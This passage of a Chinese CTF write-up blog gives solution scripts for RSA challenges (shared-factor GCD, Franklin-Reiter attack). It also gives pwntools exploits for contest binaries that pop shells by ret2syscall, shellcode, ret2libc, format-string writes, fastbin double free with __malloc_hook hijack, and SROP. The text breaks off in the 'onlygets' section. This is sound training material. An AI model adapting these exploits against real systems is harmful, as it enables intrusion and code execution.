(int(\"95479078167944012555059510194535316700724634892833216872215244225865604624747266739645717141828585085019926083587368486910129688910884679317631716166480652140861382210591129454338475212950770552050475815284838056686348436934865994292725841850312050347693728526187676352510853618070377328882007450669852024067\"),<br>     int(\"45982751479143673997045605834122952252425215373240723816593939944209409478475972946079190389743757924303865876514515981660955111210625161445971304646183507301105269006602145715411717298196867795684625232475162257873600441071166167581905690570819559110937048405959184291973185816886576321872073629520027933109\")),<br>    (int(\"104210978136595230891087798676367564823753206514856021196375425772745699072487908076016311602695745154349859462737817439238614793440776356373265528586980469884184707529198466626483692318329436310471573158231593900056091507816703811713617547371376944611174717451275120901898700134871914684744133375045083974559\"),<br>     int(\"47795890018312771415042345069340623608208640670842813420097975422251308044096964274135251807688060722467290219083318980053947501924058955107468568628695877672501235831125177972779208595710594858788771405413808960375103289445718484753806431277618590577002568794014665029007522547246875640296273255471027746174\")),<br>    (int(\"124900226916008255291364823427932270688510422097938162661205956484918846565343556390509970236724043293296270349255397548674255755736775721401583808983028413293950374478174908210743176930820078213911296986905209176239030646665342756766665656798693942784289547500890598570625257574834144161908220090513607100443\"),<br>     int(\"69687098984633733075280717007587203818312950246289738071141776045422637587297945727527258833596780023616592412869727844602694777579783707102049282895045427781576648624111949234897892934958565410274547056762375405558949445944961270752443153415695633314374042157534903100601349529735209374183246418467507261678\")),<br>    (int(\"106076461689740364509547983234550083419491598858439281865012707231490098640181388950259650519845227256038061169481367312244216059487641941663897149853760510043653747481760729965852665972680183551345973379645844201094479192927941808230165011051745283319434738229025415306651624552661593145968829146009528204139\"),<br>     int(\"49265710428903305060640098658868900623042892220055083681800681636693217103754657961211688101393980802485486994767600500130501790099820636158227682077483275519434004553444062288968146281353744052370298988361041739971609762483097545691128944207477091466023637243001938492115731909427849297711486130876631104199\")),<br>    (int(\"102962829720771882197749256670336589357311132436261490004396772895006384277874667395420850357722988048941437978183999217447648123296439722730055980585935615891138197537072428082144801107174501380609741843220821085775200534747761633269518926910390413273344760450125150389251771046927241876033660426522558543099\"),<br>     int(\"27781362665688824165016862953510332480542293818004472225574029238124263287391117238506191501951396870358266502368695220080425450119808769180065196569973906172552505849961213824318575099643862453287436796754580954469690531286909858759254426336535934955118131726082983730605020636892038993734701758861726813917\")),<br>    (int(\"73856953558568922866065269006785075537460094024399704360714920414994378603564606431481975815209474306251824674589466430959132648739341353797951609730777823223231201000238065040131404182984196612368806918632439249661194393025640075280971803068966303374536384766382205539061910067068706562997455112740019131141\"),<br>     int(\"51915893879955490253802566958190047213763169433955095339957337049322539987200895203998502264798668768412922087182570714987156269462095705471944455611913005794278946564787522329048202985918435716894853328571194687387853787530720415846161416416757464376941214309484833893359116013087534027228501529765756907692\")),<br>    (int(\"65680214781438239555281960634195867835139324061180765322384486454047655097115706363891153450590534574351578810199984914495173275168206748586690680272761313448935092560918627591896139791469443972993979003054600865154011978228594047714049604578365127852096951779635039890953169546467866563266332296396871076589\"),<br>     int(\"7684074671551210406583011634674519674891094232023770078592205024228244586008047726163330419380257939415877596490356539338012471983951869276015232840717439681128745977907088460407978913598847121925730554331272215687487501421132565249129743606275082527834357490648278977212010985656047607921255565470565331604\")),<br>    (int(\"63731094353225856606884846888435889685724323090116632497321440843471595699500046176243726442543427591048508993828354169603431232430905153081294636987864618130184112836258653457104912385524741899810300045949715807120033969791612530969664910145078555120597496861060797394280764831507105630414699914806363699919\"),<br>     int(\"45135268640531572276632359436457117328448215496689754243654316877945919791435143715382831866291594843635227890263474174236403136140577883195807877658173635800169975109646931450935492786999735420639321517460515137029043381757277121855173814947251489703164764744842744697746009656927991552781411603984151236817\")),<br>    (int(\"131288746056753706799251297343925936986513850875832463509780227830988366933051206223718132326720614580110407529508692875317142679411579909002217250676078142722857601045944930987355779316969568475651902390173931010454505887209439626309636041213111385622305466557744171022716506877192050121646433129382313101053\"),<br>     int(\"112744066328442409161417689589020315149280389883889756414854898060858251180276709990609763598732918496371494629320774504452520501164750402711455524435663355878780266124470139294032611326343529788023423464481785129539704566759175819861252326272870495129850959767518532226207699355915509845261433422668064158147\")),<br>    (int(\"83676921012282550512303401264397648068621964517656416739307673385591720719332838058073826239369638305284785180049541517570705412715000417863135734806873461343038931768632377619826665184183536387706749007414008584315847709894913964647923203871863375859788911666582003878412457638393407796910907877625937115293\"),<br>     int(\"64587468728420247302224575709884332576098583790894153541573792923889723022503636857078795897100243385366764796448591906202736770145726218999885222971394680495632871056756158108672235623119200158547824537286862014033000125072082300400506630117043725123416611633573931158643343196531565638354716489675854822449\")),<br>    (int(\"107030054015087699139519262772728868842593238547433164775729464521772074966846794437736985617483484698270493657545913338804724099411820962705592272173516224837816744344065940618045323765453821555222713203802544489064777242962969716980534278888159088999349126513541701925962726046306864101299436162647297434849\"),<br>     int(\"105657897857946314217340002015104160854509295690859274867843856620738133949061691607504418354926641487695855270865093071510546545157325232748207951711619993404044655007664070926272905377478256229789599520152039771250190159992066715349976543013222482138507293430051790459818256070324493596920250504795880801013\")),<br>    (int(\"89473794652379132450673026806587454714920435044408685254946255223602153698392388885033340513553464653246623093560821610679233365263890457633002483146981940013223156160837730360512137871272216866132440912611846386374771080980840088873686178469059518406894496503145465688024812930960266115229230274738114996907\"),<br>     int(\"65689611094849937112329541757314052031835941448096718520497381987012868452392824902099096359643626573053399516769140077760976151549630064035406584674887819668758166204826846540515185341483274907623321234090042322119063963964305382759909537483616842515806481391952678240808768552058510774610984371734780693135\")),<br>    (int(\"104526292983815049511684831813997427004903214666645560631465142732200291577549994915017639978735111413930374038654975595174609015149778366007738397229835387841781838590394212639085516120474654389008329374807038730589684341972751119427397612411672615922118786971783836634736031219403320200067949470717779338699\"),<br>     int(\"53525296179404140755501633385909663496959520446349532338066089655637364974852325384104814644355031090153086378349806439008060052338094942063965676095471089115562464095086347506474334963836939247782248394005049426530356395273840846631671561797842282022916588149878401628024484852733784293085112240910154188327\")),<br>    (int(\"137317704472567961216181080342613357343575313301339369342657385964502640491361208642059935501657870555419622774054072740316171355388149247371287529354566408424773867535596523666978660163095211923499777265022567776949469058056517042827298345927459607526976941723109800647277312883369595792063139258023975837323\"),<br>     int(\"113303720867154494697852500357644759448043823219362027898143392679102317482970393914011078897636848470883059950298962408807140718310433138772483261345280554971368830760746668022060620713920854476565351976646576658923049862482014555499098631705043425687059066208849299248851416095337775423820369155501159322885\"))<br>]<br><br># \u7528\u4e00\u4e2a\u5b57\u5178\u8bb0\u5f55\u5df2\u7ecf\u627e\u5230\u56e0\u5f0f\u5206\u89e3\u7684 n \u5bf9\u5e94 (p, q)\uff0c\u907f\u514d\u91cd\u590d\u8ba1\u7b97<br>factorizations = {}<br><br>N = len(data)<br>for i in range(N):<br>    n_i, c_i = data[i]<br>    for j in range(i+1, N):<br>        n_j, c_j = data[j]<br>        g = math.gcd(n_i, n_j)<br>        if g != 1 and g != n_i and g != n_j:<br>            # \u5bf9 n_i \u5206\u89e3<br>            if n_i not in factorizations:<br>                if n_i % g == 0:<br>                    p = g<br>                    q = n_i \/\/ p<br>                    factorizations[n_i] = (p, q)<br>            # \u5bf9 n_j \u5206\u89e3<br>            if n_j not in factorizations:<br>                if n_j % g == 0:<br>                    p = g<br>                    q = n_j \/\/ p<br>                    factorizations[n_j] = (p, q)<br>print(f\"Found factorizations for {len(factorizations)} moduli out of {N}\")<br># \u5229\u7528\u6062\u590d\u51fa\u7684\u56e0\u5f0f\u5206\u89e3\u5bf9\u5bc6\u6587\u8fdb\u884c\u89e3\u5bc6<br>e = 65537<br>for n, c in data:<br>    if n in factorizations:<br>        p, q = factorizations[n]<br>        phi = (p - 1) * (q - 1)<br>        try:<br>            d = inverse(e, phi)<br>        except Exception as ex:<br>            print(f\"Error computing inverse for n={n}\")<br>            continue<br>        m = pow(c, d, n)<br>        try:<br>            plaintext = long_to_bytes(m)<br>            text = plaintext.decode()<br>        except Exception as ex:<br>            text = plaintext.hex()<br>        # \u5982\u679c\u89e3\u5bc6\u7ed3\u679c\u4e2d\u5305\u542b CTF{ \u5219\u6253\u5370\u51fa\u6765<br>        if \"CTF{\" in text:<br>            print(\"Flag found:\", text)<br>        else:<br>            print(f\"Decrypted message for n = {n}:\\n{text}\\n\")<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"508\" height=\"240\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638835-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-186\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638835-\u56fe\u7247.png 508w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638835-\u56fe\u7247-300x142.png 300w\" sizes=\"auto, (max-width: 508px) 100vw, 508px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">tRwSiAns<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u8981\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u6211\u4eec\u5229\u7528Franklin-Reiter\u76f8\u5173\u6d88\u606f\u653b\u51fb\uff0c\u56e0\u4e3a\u4e24\u4e2a\u5bc6\u6587\u5bf9\u5e94\u7684\u660e\u6587\u5b58\u5728\u5df2\u77e5\u5dee\u5f02\uff0c\u4e14RSA\u516c\u94a5\u6307\u6570e=3\u8f83\u4f4e\u3002\u4ee5\u4e0b\u662f\u8be6\u7ec6\u6b65\u9aa4\uff1a<\/p>\n\n\n\n<h6 class=\"wp-block-heading\">\u89e3\u9898\u6b65\u9aa4\uff1a<\/h6>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u8ba1\u7b97\u54c8\u5e0c\u503c<\/strong>\uff1a\u5206\u522b\u8ba1\u7b97x1=307\u548cx2=7\u7684MD5\u54c8\u5e0c\u503c\uff0c\u8f6c\u6362\u4e3a\u6574\u6570h1\u548ch2\u3002<\/li>\n\n\n\n<li><strong>\u786e\u5b9a\u5dee\u5f02<\/strong>\uff1a\u8ba1\u7b97\u5dee\u5f02delta = h1 - h2\u3002<\/li>\n\n\n\n<li><strong>\u6784\u9020\u591a\u9879\u5f0f<\/strong>\uff1a\u5728\u6a21n\u7684\u591a\u9879\u5f0f\u73af\u4e2d\uff0c\u6784\u9020\u4e24\u4e2a\u591a\u9879\u5f0ff(x) = x\u00b3 - c1\u548cg(x) = (x - delta)\u00b3 - c2\u3002<\/li>\n\n\n\n<li><strong>\u8ba1\u7b97GCD<\/strong>\uff1a\u627e\u5230\u8fd9\u4e24\u4e2a\u591a\u9879\u5f0f\u7684\u6700\u5927\u516c\u7ea6\u6570(GCD)\uff0c\u5176\u6839\u5373\u4e3a\u660e\u6587m1 = m + h1\u3002<\/li>\n\n\n\n<li><strong>\u6062\u590d\u660e\u6587<\/strong>\uff1a\u4ecem1\u4e2d\u51cf\u53bbh1\u5f97\u5230\u539f\u59cb\u6d88\u606fm\uff0c\u5c06\u5176\u8f6c\u6362\u4e3a\u5b57\u8282\u5373\u53ef\u83b7\u5f97flag\u3002<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">import hashlib<br>from Crypto.Util.number import long_to_bytes<br><br>def hash(x):<br>    return int(hashlib.md5(str(x).encode()).hexdigest(), 16)<br><br>n = 100885785256342169056765112203447042910886647238787490462506364977429519290706204521984596783537199842140535823208433284571495132415960381175163434675775328905396713032321690195499705998621049971024487732085874710868565606249892231863632731481840542506411757024315315311788336796336407286355303887021285839839<br>e = 3<br>c1 = 41973910895747673899187679417443865074160589754180118442365040608786257167532976519645413349472355652086604920132172274308809002827286937134629295632868623764934042989648498006706284984313078230848738989331579140105876643369041029438708179499450424414752031366276378743595588425043730563346092854896545408366<br>c2 = 41973912583926901518444642835111314526720967879172223986535984124576403651553273447618087600591347032422378272332279802860926604693828116337548053006928860031338938935746179912330961194768693506712533420818446672613053888256943921222915644107389736912059397747390472331492265060448066180414639931364582445814<br><br>h1 = hash(307)<br>h2 = hash(7)<br>delta = h1 - h2<br><br># \u4f7f\u7528SageMath\u8fdb\u884c\u591a\u9879\u5f0fGCD\u8ba1\u7b97<br># \u4ee5\u4e0b\u4ee3\u7801\u9700\u5728SageMath\u73af\u5883\u4e2d\u8fd0\u884c<br>R.&lt;x&gt; = PolynomialRing(Zmod(n))<br>f = x^3 - c1<br>g = (x - delta)^3 - c2<br><br>def gcd(a, b):<br>    while b:<br>        a, b = b, a % b<br>    return a.monic()<br><br>h = gcd(f, g)<br><br>if h.degree() == 1:<br>    m1 = int(-h[0])<br>    m = m1 - h1<br>    print(\"Flag:\", long_to_bytes(m).decode())<br>else:<br>    print(\"Failed to find the flag.\")<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Pwn<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>overflow<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u9759\u6001\u7f16\u8bd1,32\u4f4d,\u6ca1\u6709\u5f00pie,\u6ca1\u4ec0\u4e48\u597d\u8bf4\u7684,\u76f4\u63a5\u6253ret2syscall<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"node1.tgctf.woooo.tech\",30414)<br>libc = ELF(\".\/libc.so.6\")<br>#io = process(\".\/pwn\")<br>context(os='linux', arch='i386')<br>#context.log_level = 'debug'<br>def debug():<br>    gdb.attach(io)<br>ebx = 0x8049022<br>eax = 0x80b470a<br>edx = 0x8060bd1<br>ecx = 0x8049802<br>int_0x80 = 0x8073d70<br>name = 0x080EF320<br>payload = b'\/bin\/sh\\x00' + p32(eax) + p32(11) + p32(ebx) + p32(name) + p32(ecx) + p32(0) + p32(edx) + p32(0) + p32(int_0x80)<br>io.sendafter(b'name?', payload)<br>payload = b'a' * 0xc8 + p32(name + 12)<br>#debug()<br>io.sendlineafter(b'right?', payload)<br>io.interactive()<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"921\" height=\"382\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638856-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-187\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638856-\u56fe\u7247.png 921w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638856-\u56fe\u7247-300x124.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638856-\u56fe\u7247-768x319.png 768w\" sizes=\"auto, (max-width: 921px) 100vw, 921px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">shellcode \u5bc4\u5b58\u5668\u90fd\u6e05\u695a\u4e86,\u4f46\u662frdi\u8fd8\u6709\u6570\u636e,\u8003\u8651\u6062\u590d\u8bfb\u5199\u6743\u9650\u7136\u540e\u5199\u5165shellcode<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"node2.tgctf.woooo.tech\", 30254)<br>libc = ELF(\".\/libc.so.6\")<br>#io = process(\".\/pwn\")<br>context(os='linux', arch='amd64')<br>def debug():<br>    gdb.attach(io)<br>shellcode = \"\"\"<br>mov sil, 0xff<br>mov dl, 0x7<br>mov al, 10<br>syscall<br>mov rsi, rdi<br>xor edi, edi<br>mov dl, 0xff<br>syscall<br>\"\"\"<br>payload = asm(shellcode)<br>io.send(payload)<br>#debug()<br>payload = b'\\x00' * 0x12<br>shellcode = \"\"\"<br>rdfsbase rsp<br>mov rax,0x68732f6e69622f<br>push rax<br>mov rdi, rsp<br>xor rsi, rsi<br>xor rdx, rdx<br>mov rax, 59<br>syscall<br>\"\"\"<br>payload += asm(shellcode)<br>pause()<br>io.send(payload)<br>io.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">stack<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u4f2a\u9020\u4e86\u4e00\u4e0b\u5f71\u5b50\u6808\u7684\u8c03\u7528\u6d41\u7a0b,\u4f46\u662f\u5982\u679c\u8bfb\u5165\u8d85\u51fa\u7684\u8bdd,\u4f1a\u8fdb\u5165\u5230\u4e00\u4e2a\u51fd\u6570,\u5c31\u53ef\u4ee5\u6253ret2syscall<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"node1.tgctf.woooo.tech\",31206)<br>libc = ELF(\".\/libc.so.6\")<br>#io = process(\".\/pwn\")<br>context(os='linux', arch='amd64')<br>#context.log_level = 'debug'<br>def debug():<br>    gdb.attach(io)<br>payload = b'a' * 0x40 + p64(59) + p64(0x404108) + p64(0) * 2 + p64(0x404108)<br>io.sendafter(b'name?', payload)<br>io.sendafter(b'say', b'a' * 0x50)<br>io.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u7b7e\u5230<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u4ec0\u4e48\u53ef\u8bf4\u7684,\u57fa\u7840\u7684ret2libc<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"node2.tgctf.woooo.tech\",31664)<br>libc = ELF(\".\/libc.so.6\")<br>#io = process(\".\/pwn\")<br>context(os='linux', arch='amd64')<br>#context.log_level = 'debug'<br>def debug():<br>    gdb.attach(io)<br>rdi = 0x401176<br>payload = b'a' * 0x78 + p64(rdi) + p64(0x404018) + p64(0x401060) + p64(0x401090)<br>#debug()<br>io.sendlineafter(b'name.', payload)<br>libc_base = u64(io.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')) - libc.sym[\"puts\"]<br>print(hex(libc_base))<br>payload = b'a' * 0x78 + p64(rdi + 1) + p64(rdi) + p64(libc_base + next(libc.search(b\"\/bin\/sh\"))) + p64(libc_base + libc.sym[\"system\"])<br>io.sendlineafter(b'name.', payload)<br>io.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">fmt<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u5f00pie,\u5b58\u5728\u4e00\u6b21\u683c\u5f0f\u5316\u5b57\u7b26\u4e32,\u5e76\u4e14\u76f4\u63a5\u7ed9\u4e86\u6808\u7684\u5730\u5740,\u6211\u8fd9\u91cc\u76f4\u63a5\u7206\u7834\u6808\u4e86(1\/4096\u7684\u6982\u7387),\u4f46\u662f\u5e94\u8be5\u53ef\u4ee5\u6808\u8fc1\u79fb\u628arbp\u79fb\u52a8\u5230\u4e0emagic\u53d8\u91cf\u53c8\u4e00\u5b9a\u504f\u79fb\u7684\u4f4d\u7f6e,\u7136\u540e\u5c31\u80fd\u6539magic\u53d8\u91cf\u4e86,\u5c31\u80fd\u591a\u6b21\u683c\u5f0f\u5316\u5b57\u7b26\u4e32(\u5f53\u7136\u6211\u6ca1\u8fd9\u6837\u6253)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"776\" height=\"540\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638926-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-188\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638926-\u56fe\u7247.png 776w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638926-\u56fe\u7247-300x209.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638926-\u56fe\u7247-768x534.png 768w\" sizes=\"auto, (max-width: 776px) 100vw, 776px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>global io<br><br>def main():<br>    global io<br>    io = remote(\"node1.tgctf.woooo.tech\", 30594)<br>    libc = ELF(\".\/libc.so.6\")<br>    #io = process(\".\/pwn\")<br>    context(os='linux', arch='amd64')<br>    def debug():<br>        gdb.attach(io)<br>    io.recvuntil(b'gift ')<br>    #debug()<br>    buf = int(io.recvuntil(b'\\n', drop=True), 16)<br>    og = 0xe3b01<br>    payload = b'%235c%9$hhn%35350c%10$hn' + p64(buf + 0x6a) + p64(buf + 0x68)<br>    io.sendafter(b'name', payload)<br><br>    io.recvuntil(b'\\x7f')<br>    io.sendline(b'ls')<br>    io.recvuntil(b'flag')<br>while True:<br>    try:<br>        main()<br>        break<br>    except:<br>        io.close()<br>        continue<br>io.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">heap<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">2.23\u7684\u5806,\u6ca1\u6709\u5f00\u542fpie,\u4f46\u662f\u65e0\u6cd5\u7533\u8bf7\u80fd\u591f\u8fdb\u5165unsorted bin\u7684\u5806\u5757,\u660e\u663e\u7684double free\u6f0f\u6d1e,\u4f46\u662f\u7a0b\u5e8f\u4e2d\u7ed9\u4e86\u4e00\u6bb5\u53ef\u4ee5\u4efb\u610f\u5199\u7684\u5185\u5b58,\u5730\u5740\u5df2\u77e5,\u5229\u7528fast bin attack\u5c06\u5176\u5f53\u4f5c\u5806,\u5e76\u518d\u6b21\u4f2a\u9020\u5927\u5c0f\u6ee1\u8db3unsorted\u7684\u6761\u4ef6,\u5c31\u6709\u57fa\u5730\u5740\u4e86,\u7136\u540e\u5229\u7528fast bin attack(\u5fd8\u4e86\u54ea\u4e2ahouse\u4e86)\u52ab\u6301malloc hook\u653e\u5165ogg,(\u8fd9\u8fb9\u5229\u7528realloc\u8c03\u6808\u4e86)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"node1.tgctf.woooo.tech\",30423)<br>libc = ELF(\".\/libc.so.6\")<br>#io = process(\".\/pwn\")<br>context(os='linux', arch='amd64')<br>#context.log_level = 'debug'<br>def debug():<br>    gdb.attach(io)<br><br>def malloc(size, content):<br>    io.sendlineafter(b'4. exit', b'1')<br>    io.sendlineafter(b'size', str(size).encode())<br>    io.sendafter(b'else?', content)<br><br>def free(idx):<br>    io.sendlineafter(b'4. exit', b'2')<br>    io.sendlineafter(b'delete?', str(idx).encode())<br><br>def edit(content):<br>    io.sendlineafter(b'4. exit', b'3')<br>    io.sendafter(b'name?', content)<br>name = 0x6020C0<br>io.sendafter(b'your name?', p64(0) + p64(0x71))<br>malloc(0x60, b'a') #0<br>malloc(0x60, b'a') #1<br>malloc(0x60, b'a') #2<br><br>free(0)<br>free(1)<br>free(0)<br>malloc(0x60, p64(name)) #3<br>malloc(0x60, b'a') #4<br>malloc(0x60, b'a') #5<br>malloc(0x60, b'a') #6<br>payload = p64(0) + p64(0x91)<br>payload = payload.ljust(0x98, b'\\x00') + p64(0x21) + p64(0) + p64(0) + p64(0) + p64(0x21)<br>edit(payload)<br>free(6)<br>edit(b'a' * 0x10)<br>libc.address = u64(io.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')) - 0x68 - libc.sym[\"__malloc_hook\"]<br>print(f'libc:{hex(libc.address)}')<br><br>edit(p64(0) + p64(0x91))<br>malloc(0x60, b'a') #7<br>malloc(0x10, b'a') #8<br>free(0)<br>free(1)<br>free(0)<br>malloc(0x60, p64(libc.sym[\"__malloc_hook\"] - 35)) #9<br>malloc(0x60, b'a') #10<br>malloc(0x60, b'a') #11<br>malloc(0x60, b'aaa' + p64(0) + p64(libc.address + 0x4527a) + p64(libc.sym[\"realloc\"] + 12)) #12<br>io.sendlineafter(b'4. exit', b'1')<br>io.sendlineafter(b'size', b'20')<br>#free(1)<br>#debug()<br>io.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">noret<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u6808\u6ea2\u51fa,\u4f46\u662f\u6ca1\u6709libc,\u7a0b\u5e8f\u91cc\u9762\u6709\u4e00\u4e0b\u540e\u95e8gadget<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"589\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638935-\u56fe\u7247-1024x589.png\" alt=\"\" class=\"wp-image-189\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638935-\u56fe\u7247-1024x589.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638935-\u56fe\u7247-300x173.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638935-\u56fe\u7247-768x442.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638935-\u56fe\u7247.png 1320w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"887\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638942-\u56fe\u7247-1024x887.png\" alt=\"\" class=\"wp-image-191\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638942-\u56fe\u7247-1024x887.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638942-\u56fe\u7247-300x260.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638942-\u56fe\u7247-768x665.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638942-\u56fe\u7247.png 1122w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5229\u7528\u6808\u8fc1\u79fb,\u6253srop<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"node1.tgctf.woooo.tech\",30403)<br>libc = ELF(\".\/libc.so.6\")<br>#io = process(\".\/pwn\")<br>context(os='linux', arch='amd64')<br>#context.log_level = 'debug'<br>def debug():<br>    gdb.attach(io)<br>def read(content):<br>    io.sendafter(b'3. Exit', b'2')<br>    io.sendafter(b'feedback:', content)<br>payload = b'a' * 0x100 + p64(0x40108f) + p64(0x4023A8)<br>read(payload)<br>sig = SigreturnFrame()<br>sig.rax = 59<br>sig.rdi = 0x4023c0<br>sig.rip = 0x401163<br>#0x4022a0<br>payload = bytes(sig).ljust(0x100, b'\\x00') + p64(0x40108F) + p64(0x402288) + p64(0x401024) + p64(0x401163) + b'\/bin\/sh'<br>read(payload)<br>#debug()<br>payload = b'\\x00' * 0x100 + p64(0x401010) + p64(0x4023af) + p64(0x4023b8) + p64(0xfffffffffffffff2)<br>read(payload)<br>io.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">onlygets<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u9006\u5411\u540e\u53d1\u73b0\u53ea\u6709gets<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"724\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638949-\u56fe\u7247-1024x724.png\" alt=\"\" class=\"wp-image-192\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638949-\u56fe\u7247-1024x724.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638949-\u56fe\u7247-300x212.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638949-\u56fe\u7247-768x543.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638949-\u56fe\u7247.png 1032w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"582\" height=\"162\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638954-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-193\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638954-\u56fe\u7247.png 582w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638954-\u56fe\u7247-300x84.png 300w\" sizes=\"auto, (max-width: 582px) 100vw, 582px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">got\u8868\u4e0d\u53ef\u5199<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u8fd9\u4e2a\u601d\u8def\u7b97\u662f\u975e\u9884\u671f\u4e86,\u4f46\u662f\u6211\u8ba4\u4e3a\u5bcc\u6709\u4e00\u5b9a\u542f\u53d1\u6027,\u6211\u8fd9\u8fb9\u5148\u5927\u6982\u63cf\u8ff0\u4e00\u4e0b\u8fd9\u4e2a\u8fc7\u7a0b,\u518d\u7ed3\u5408exp\u4ed4\u7ec6\u5206\u6790<del>(\u6709\u4ec0\u4e48\u4e0d\u7406\u89e3\u7684\u6b22\u8fce\u6765gank\u6211)<\/del>(\u6ce8\u610f\u9700\u8981\u4f7f\u7528\u4e0e\u8fdc\u7a0b\u73af\u5883\u76f8\u540c\u7684libc, \u7248\u672c\u5927\u6982\u662f2.35)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4e86\u4ecb\u7ecd\u65b9\u4fbf \u6211\u8fd9\u91cc\u5173\u95ed\u4e86aslr<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u7b80\u8981\u601d\u8def<\/h4>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"241\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638959-\u56fe\u7247-1024x241.png\" alt=\"\" class=\"wp-image-194\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638959-\u56fe\u7247-1024x241.png 1024w, 